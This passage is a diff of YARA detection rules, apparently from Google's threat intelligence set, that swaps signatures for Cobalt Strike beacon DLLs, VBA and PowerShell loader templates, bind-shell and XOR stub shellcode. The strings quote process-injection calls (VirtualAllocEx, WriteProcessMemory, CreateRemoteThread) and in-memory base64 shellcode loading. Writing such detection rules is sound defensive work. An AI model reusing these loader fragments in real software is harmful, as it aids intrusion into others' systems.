+		$paramsSys32 = ".ReferencedAssemblies.AddRange(@(\"System.dll\", [PsObject].Assembly.Location))" nocase
+		$paramsGIM = ".GenerateInMemory = $True" nocase
+		$result = "$compiler.CompileAssemblyFromSource($params, $assembly)" nocase
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_1_And_V4_2
+rule GCTI_Cobaltstrike__Resources_Browserpivot_Bin_V1_48_To_V3_14_And_Sleeve_Browserpivot_Dll_V4_0_To_V4_X
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.dll Versions 4.1 and 4.2"
+		description = "Cobalt Strike's resources/browserpivot.bin from v1.48 to v3.14 and sleeve/browserpivot.dll from v4.0 to at least v4.4"
 		author = "gssincla@google.com"
-		id = "793df916-bdf7-5743-b008-0113caf38bae"
+		id = "55086544-6684-526b-914f-505a562be458"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L903-L934"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Browserpivot_Bin_v1_48_to_v3_14_and_Sleeve_Browserpivot_Dll_v4_0_to_v4_x.yara#L17-L60"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "daa42f4380cccf8729129768f3588bb98e4833b0c40ad0620bb575b5674d5fc3"
-		logic_hash = "7280a5c3f478ea40b6b72fb4669d5b8c21603e7fbfbc3815a83bc462ee19c0f5"
+		hash = "12af9f5a7e9bfc49c82a33d38437e2f3f601639afbcdc9be264d3a8d84fd5539"
+		logic_hash = "416554d31c105fd96aeaef508847efe2889590909c8d0025e3862e5b24078131"
 		score = 75
 		quality = 85
 		tags = ""
-		rs2 = "9de55f27224a4ddb6b2643224a5da9478999c7b2dea3a3d6b3e1808148012bcf"
 
 	strings:
-		$version_sig = { 48 57 8B F2 83 F8 63 0F 87 3C 03 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
+		$socket_recv = {
+			FF [1-5]
+			83 ?? FF
+			74 ??
+			85 C0
+			(74 | 76) ??
+			03 ??
+			83 ?? 02
+			72 ??
+			80 ?? 3E FF 0A
+			75 ??
+			80 ?? 3E FE 0D
+		}
+		$fmt = "%1024[^ ] %8[^:]://%1016[^/]%7168[^ ] %1024[^ ]"
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_3_V4_4_V4_5_And_V4_6
+rule GCTI_Cobaltstrike_Resources_Template_X86_Vba_V3_8_To_V4_X
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.dll Versions 4.3 and 4.4"
+		description = "Cobalt Strike's resources/template.x86.vba signature for versions v3.8 to v4.x"
 		author = "gssincla@google.com"
-		id = "976e087c-f371-5fc6-85f8-9c803a91f549"
+		id = "11c7758e-93b2-5fe3-873d-b98de579d2b4"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L936-L967"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_x86_Vba_v3_8_to_v4_x.yara#L17-L37"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "51490c01c72c821f476727c26fbbc85bdbc41464f95b28cdc577e5701790845f"
-		logic_hash = "6608a84c4fd3bf77fd5b426da8be250d8b99878bd746fa23789f4791a164ce33"
+		hash = "fc66cb120e7bc9209882620f5df7fdf45394c44ca71701a8662210cf3a40e142"
+		logic_hash = "7114515477d82651806eccef34f599f6ffd4614f987dee29417ac6ef7a1a1c38"
 		score = 75
 		quality = 85
 		tags = ""
-		rs2 = "78a6fbefa677eeee29d1af4a294ee57319221b329a2fe254442f5708858b37dc"
 
 	strings:
-		$version_sig = { 48 57 8B F2 83 F8 65 0F 87 47 03 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
+		$createstuff = "Function CreateStuff Lib \"kernel32\" Alias \"CreateRemoteThread\"" nocase
+		$allocstuff = "Function AllocStuff Lib \"kernel32\" Alias \"VirtualAllocEx\"" nocase
+		$writestuff = "Function WriteStuff Lib \"kernel32\" Alias \"WriteProcessMemory\"" nocase
+		$runstuff = "Function RunStuff Lib \"kernel32\" Alias \"CreateProcessA\"" nocase
+		$vars = "Dim rwxpage As Long" nocase
+		$res = "RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)"
+		$rwxpage = "AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)"
 
 	condition:
-		all of them
+		all of them and @vars [ 1 ] < @res [ 1 ] and @allocstuff [ 1 ] < @rwxpage [ 1 ]
 }
-rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_7_Suspected
+rule GCTI_Cobaltstrike_Resources_Template_X64_Ps1_V3_0_To_V4_X_Excluding_3_12_3_13
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.dll Versions 4.7 (suspected, not confirmed)"
+		description = "Cobalt Strike's resources/template.x64.ps1, resources/template.hint.x64.ps1 and resources/template.hint.x32.ps1 from v3.0 to v4.x except 3.12 and 3.13"
 		author = "gssincla@google.com"
-		id = "4b6f90dd-69f3-5555-9195-6a0aed0fff58"
+		id = "5a808113-aacb-56ca-b3ec-166c73c54b85"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L969-L1002"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_x64_Ps1_v3_0_to_v4_x_excluding_3_12_3_13.yara#L17-L37"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "da9e91b3d8df3d53425dd298778782be3bdcda40037bd5c92928395153160549"
-		logic_hash = "297ff7c3acfe6f9676dc6c265c548f017f39ccc5217617344e3bccc704ac4c78"
+		hash = "ff743027a6bcc0fee02107236c1f5c96362eeb91f3a5a2e520a85294741ded87"
+		logic_hash = "80823b8590004686ebd83958cad16094ea2f6958a837d87934507531a00df77a"
 		score = 75
-		quality = 85
+		quality = 81
 		tags = ""
 
 	strings:
-		$version_sig = { 53 56 48 57 8B F2 83 F8 67 0F 87 5E 03 00 00  }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
+		$dda = "[AppDomain]::CurrentDomain.DefineDynamicAssembly" nocase
+		$imm = "InMemoryModule" nocase
+		$mdt = "MyDelegateType" nocase
+		$rd = "New-Object System.Reflection.AssemblyName('ReflectedDelegate')" nocase
+		$data = "[Byte[]]$var_code = [System.Convert]::FromBase64String(" nocase
+		$64bitSpecific = "[IntPtr]::size -eq 8"
+		$mandatory = "Mandatory = $True"
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_2
+rule GCTI_Cobaltstrike_Resources_Bind_Bin_V2_5_Through_V4_X
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.2"
+		description = "Cobalt Strike's resources/bind.bin signature for versions 2.5 to 4.x"
 		author = "gssincla@google.com"
-		id = "61188243-0b90-5bff-bcc8-50f10ed941f6"
+		id = "32f129c1-9845-5843-9e16-7d9af217b8e2"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1029-L1068"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bind_Bin_v2_5_through_v4_x.yara#L17-L111"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "5993a027f301f37f3236551e6ded520e96872723a91042bfc54775dcb34c94a1"
-		logic_hash = "3803aaac537aec0b188870177e510a3789a71c19be576569b59aa146b2ba62c5"
+		hash = "3727542c0e3c2bf35cacc9e023d1b2d4a1e9e86ee5c62ee5b66184f46ca126d1"
+		logic_hash = "cf04e257590cf0673059348f5c15926918eb8aee40e864ae65979360aca80013"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 4C 8D 05 9F F8 FF FF 8B D3 48 8B CF E8 05 1A 00 00
-                     EB 0A 8B D3 48 8B CF E8 41 21 00 00 48 8B 5C 24 30
-                     48 83 C4 20 }
-		$decoder = { 80 31 ?? FF C2 48 FF C1 48 63 C2 48 3D 10 06 00 00 }
+		$apiLocator = {
+			31 ??
+			AC
+			C1 ?? 0D
+			01 ??
+			38 ??
+			75 ??
+			03 [2]
+			3B [2]
+			75 ??
+			5?
+			8B ?? 24
+			01 ??
+			66 8B [2]
+			8B ?? 1C
+			01 ??
+			8B ?? 8B
+			01 ??
+			89 [3]
+			5?
+			5?
+		}
+		$ws2_32 = {
+			5D
+			68 33 32 00 00
+			68 77 73 32 5F
+		}
+		$listenaccept = {
+			5?
+			5?
+			68 B7 E9 38 FF
+			FF ??
+			5?
+			5?
+			5?
+			68 74 EC 3B E1
+		}
 
 	condition:
-		all of them
+		$apiLocator and $ws2_32 and $listenaccept
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_3
+rule GCTI_Cobaltstrike_Resources_Artifact32Svc_Exe_V3_1_V3_2_V3_14_And_V4_X
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.3"
+		description = "Cobalt Strike's resources/artifact32svc(big).exe signature for versions 3.1 and 3.2 (with overlap with v3.14 through v4.x)"
 		author = "gssincla@google.com"
-		id = "fb96ecff-809e-5704-974e-a2d8ef022daa"
+		id = "732169be-e334-5774-b0ac-54b217a8b681"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1070-L1109"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32svc_Exe_v1_49_to_v4_x.yara#L53-L77"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "7b00721efeff6ed94ab108477d57b03022692e288cc5814feb5e9d83e3788580"
-		logic_hash = "514d491b8066ed7127ebb152a27efbe65e1121da3b5460afe6987920a91f2863"
+		hash = "871390255156ce35221478c7837c52d926dfd581173818620b738b4b029e6fd9"
+		logic_hash = "b55211fc2dbe100edb19c3f3a000be513144e3556c4bce8a29a3c0b77451ba96"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 8B D3 48 8B CF E8 89 66 00 00 E9 23 FB FF FF
-                     41 B8 01 00 00 00 E9 F3 FD FF FF 48 8D 0D 2A F8 FF FF
-                     E8 8D 2B 00 00 48 8B 5C 24 30 48 83 C4 20 }
-		$decoder = { 80 31 ?? FF C2 48 FF C1 48 63 C2 48 3D 10 06 00 00 }
+		$decoderFunc = { 89 ?? B? 04 00 00 00 99 F7 FF 8B [2] 8A [2] 30 }
 
 	condition:
-		all of them
+		$decoderFunc
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_4
+rule GCTI_Cobaltstrike_Resources_Xor_Bin_V2_X_To_V4_X
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.4"
+		description = "Cobalt Strike's resource/xor.bin signature for version 2.x through 4.x"
 		author = "gssincla@google.com"
-		id = "97ef152c-86c7-513c-a881-e7d594d38dcf"
+		id = "1754746c-3a42-5f7d-808a-ba2e1c0a270e"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1111-L1148"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Xor_Bin__32bit_v2_x_to_4_x.yara#L17-L36"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "5a4d48c2eda8cda79dc130f8306699c8203e026533ce5691bf90363473733bf0"
-		logic_hash = "65aa42265133038f6f568c021c0228440e84e236829af50796a73f6923f46395"
+		hash = "211ccc5d28b480760ec997ed88ab2fbc5c19420a3d34c1df7991e65642638a6f"
+		logic_hash = "ad662a263ede6c3ba964baf8abe4848ed1e994f2c236d4315cb60c1d51442620"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 8B D3 48 8B CF E8 56 6F 00 00 E9 17 FB FF FF
-                     41 B8 01 00 00 00 8B D3 48 8B CF E8 41 4D 00 00
-                     48 8B 5C 24 30 48 83 C4 20 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
+		$stub52 = {fc e8 ?? ?? ?? ?? [1-32] eb 27 5? 8b ??    83 c? ?4 8b ??    31 ?? 83 c? ?4 5? 8b ??    31 ?? 89 ??    31 ?? 83 c? ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb ea 5? ff e? e8 d4 ff ff ff}
+		$stub56 = {fc e8 ?? ?? ?? ?? [1-32] eb 2b 5d 8b ?? ?? 83 c5 ?4 8b ?? ?? 31 ?? 83 c5 ?4 55 8b ?? ?? 31 ?? 89 ?? ?? 31 ?? 83 c5 ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e8 5? ff e? e8 d? ff ff ff}
 
 	condition:
-		all of them
+		any of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_5_Hf1_And_V3_5_1
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_44
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.5-hf1 and 3.5.1"
+		description = "Cobalt Strike's resources/beacon.dll Version 1.44"
 		author = "gssincla@google.com"
-		id = "0c0e87d3-e0e2-5ddc-9d89-5e56443da4b8"
+		id = "935ee27f-ce1b-5491-b4a3-cb78f199ab1b"
 		date = "2022-11-18"
 		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1150-L1189"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L17-L49"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "934134ab0ee65ec76ae98a9bb9ad0e9571d80f4bf1eb3491d58bacf06d42dc8d"
-		logic_hash = "5cd69554edb91956f4ec4c3c5e55f4cd9c3665656c318220ba3a270c0bb0a690"
+		hash = "75102e8041c58768477f5f982500da7e03498643b6ece86194f4b3396215f9c2"
+		logic_hash = "ebed8b6dc0b929164b1aa25b491b9d2fbb61d380a8b1268df7d424afe90f613d"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 8B D3 48 8B CF E8 38 70 00 00 E9 FD FA FF FF
-                     41 B8 01 00 00 00 8B D3 48 8B CF E8 3F 4D 00 00
-                     48 8B 5C 24 30 48 83 C4 20 5F }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
+		$version_sig = { 0F B7 D2 4A 53 8B D9 83 FA 04 77 36 FF 24 }
+		$decode = { B1 ?? 30 88 [4] 40 3D 28 01 00 00 7C F2 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_6
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_45
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.6"
+		description = "Cobalt Strike's resources/beacon.dll Version 1.45"
 		author = "gssincla@google.com"
-		id = "9651a1ca-d8ea-5b0b-bcba-a850c2e07791"
+		id = "04d4d0ee-f1ee-5888-8108-ca55243c770a"
 		date = "2022-11-18"
 		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1191-L1233"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L51-L84"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "92b0a4aec6a493bcb1b72ce04dd477fd1af5effa0b88a9d8283f26266bb019a1"
-		logic_hash = "d6aff186a01386992f004cb775d280f9b6e7e16d7ecee662d61e3485b0bc088b"
+		hash = "1a92b2024320f581232f2ba1e9a11bef082d5e9723429b3e4febb149458d1bb1"
+		logic_hash = "b1472907e0fe0cb26219c268f23483681cc076dab96c1b0f2f0ee472ad319b4f"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 48 89 5C 24 08 57 48 83 EC 20 41 8B D8 48 8B FA 83 F9 27
-                     0F 87 47 03 00 00 0F 84 30 03 00 00 83 F9 14
-                     0F 87 A4 01 00 00 0F 84 7A 01 00 00 83 F9 0C
-                     0F 87 C8 00 00 00 0F 84 B3 00 00 00 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
+		$version_sig = { 51 0F B7 D2 4A 53 56 83 FA 08 77 6B FF 24 }
+		$decode = { B1 ?? 30 88 [4] 40 3D 28 01 00 00 7C F2 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_7
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_46
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.7"
+		description = "Cobalt Strike's resources/beacon.dll Version 1.46"
 		author = "gssincla@google.com"
-		id = "27fad98a-2882-5c52-af6e-c7dcf5559624"
+		id = "79715042-1963-5e48-8b64-7d915da58d84"
 		date = "2022-11-18"
 		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1235-L1274"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L86-L115"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "81296a65a24c0f6f22208b0d29e7bb803569746ce562e2fa0d623183a8bcca60"
-		logic_hash = "89499e01acd607b2fbcdd134c74ca4a901c00c7c9cf70dd241cc538c1c0d083a"
+		hash = "44e34f4024878024d4804246f57a2b819020c88ba7de160415be38cd6b5e2f76"
+		logic_hash = "1a5c63c8b5527c0442830a73ded8458cf82a9d8ecb9b31e9a02c10b27ed6195e"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 48 89 5C 24 08 57 48 83 EC 20 41 8B D8 48 8B FA 83 F9 28
-                     0F 87 7F 03 00 00 0F 84 67 03 00 00 83 F9 15
-                     0F 87 DB 01 00 00 0F 84 BF 01 00 00 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
+		$version_sig = { 8B F2 83 F9 0C 0F 87 8E 00 00 00 FF 24 }
+		$decode = { B1 ?? 30 88 [4] 40 3D A8 01 00 00 7C F2 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_8
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_47
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.8"
+		description = "Cobalt Strike's resources/beacon.dll Version 1.47"
 		author = "gssincla@google.com"
-		id = "89809d81-9a8b-5cf3-a251-689bf52e98e0"
+		id = "ac2249a9-210c-581f-8dd1-7619356dca7d"
 		date = "2022-11-18"
 		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1276-L1310"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L117-L144"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "547d44669dba97a32cb9e95cfb8d3cd278e00599e6a11080df1a9d09226f33ae"
-		logic_hash = "8845b71ce4401fd194eb88f04dbf1f313af8b4853da004e63261ca3158fcb1d4"
+		hash = "8ff6dc80581804391183303bb39fca2a5aba5fe13d81886ab21dbd183d536c8d"
+		logic_hash = "8c463d3122f3f79ff5d9b88e3d4f5ed14e6c581edfdfafba8a0c596c494ac1b1"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 8B D3 48 8B CF E8 7A 52 00 00 EB 0D 45 33 C0 8B D3 48 8B CF
-                     E8 8F 55 00 00 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
+		$version_sig = { 83 F8 12 77 10 FF 24 }
+		$decode = { B1 ?? 30 88 [4] 40 3D A8 01 00 00 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_11
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_48
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.11 (two subversions)"
+		description = "Cobalt Strike's resources/beacon.dll Version 1.48"
 		author = "gssincla@google.com"
-		id = "bf0c7661-2583-5fca-beb5-abb2b50c860d"
+		id = "dd15099f-ad19-58df-9ed4-ce66d7ee8540"
 		date = "2022-11-18"
 		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1312-L1366"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L146-L178"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "64007e104dddb6b5d5153399d850f1e1f1720d222bed19a26d0b1c500a675b1a"
-		logic_hash = "9c34b23b659463a0ab92949031a9b3246aa95256d1548b2f0ad53fe3d379997d"
+		hash = "dd4e445572cd5e32d7e9cc121e8de337e6f19ff07547e3f2c6b7fce7eafd15e4"
+		logic_hash = "3f789eaf334c9bb3236d2834f38156aa92b22a5b674450977086378d195dd216"
 		score = 75
 		quality = 85
 		tags = ""
-		rs2 = "815f313e0835e7fdf4a6d93f2774cf642012fd21ce870c48ff489555012e0047"
 
 	strings:
-		$version_sig = { 48 83 EC 20 41 8B D8 48 8B FA 83 F9 2D 0F 87 B2 03 00 00
-                     0F 84 90 03 00 00 83 F9 17 0F 87 F8 01 00 00
-                     0F 84 DC 01 00 00 83 F9 0E 0F 87 F9 00 00 00
-                     0F 84 DD 00 00 00 FF C9 0F 84 C0 00 00 00 83 E9 02
-                     0F 84 A6 00 00 00 FF C9 }
-		$decoder = {
-      80 34 28 ??
-      48 FF C0
-      48 3D 00 10 00 00
-      7C F1
-    }
+		$version_sig = { 48 57 8B F1 8B DA 83 F8 17 77 12 FF 24 }
+		$decode = { B1 ?? 30 88 [4] 40 3D A8 01 00 00 7C F2 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_12
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_49
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.12"
+		description = "Cobalt Strike's resources/beacon.dll Version 1.49"
 		author = "gssincla@google.com"
-		id = "6eeae9f4-96e0-5a98-a8dc-779c916cd968"
+		id = "871e28c9-b580-5a32-8529-2290ded1a1b6"
 		date = "2022-11-18"
 		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1368-L1404"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L180-L211"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "8a28b7a7e32ace2c52c582d0076939d4f10f41f4e5fa82551e7cc8bdbcd77ebc"
-		logic_hash = "7457b20f2a7dc7e8c3317cedbcfccae30ecc8dc164188c0321f9485fdfab0f6e"
+		hash = "52b4bd87e21ee0cbaaa0fc007fd3f894c5fc2c4bae5cbc2a37188de3c2c465fe"
+		logic_hash = "935232d5ddccdc0401b4d911cdc73a48305347b495219c8c893615fe918f32f1"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 8B D3 48 8B CF E8 F8 2E 00 00 EB 16 8B D3 48 8B CF
-                     E8 00 5C 00 00 EB 0A 8B D3 48 8B CF E8 64 4F 00 00 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
+		$version_sig = { 48 56 83 F8 1E 0F 87 23 01 00 00 FF 24 }
+		$decoder = { B1 ?? 90 30 88 [4] 40 3D A8 01 00 00 7C F2 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_13
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_0_49
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.13"
+		description = "Cobalt Strike's resources/beacon.dll Version 2.0.49"
 		author = "gssincla@google.com"
-		id = "202eb8ea-7afb-515b-9306-67514abf5e55"
+		id = "087c584a-5ceb-536a-8842-53fbd668df54"
 		date = "2022-11-18"
 		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
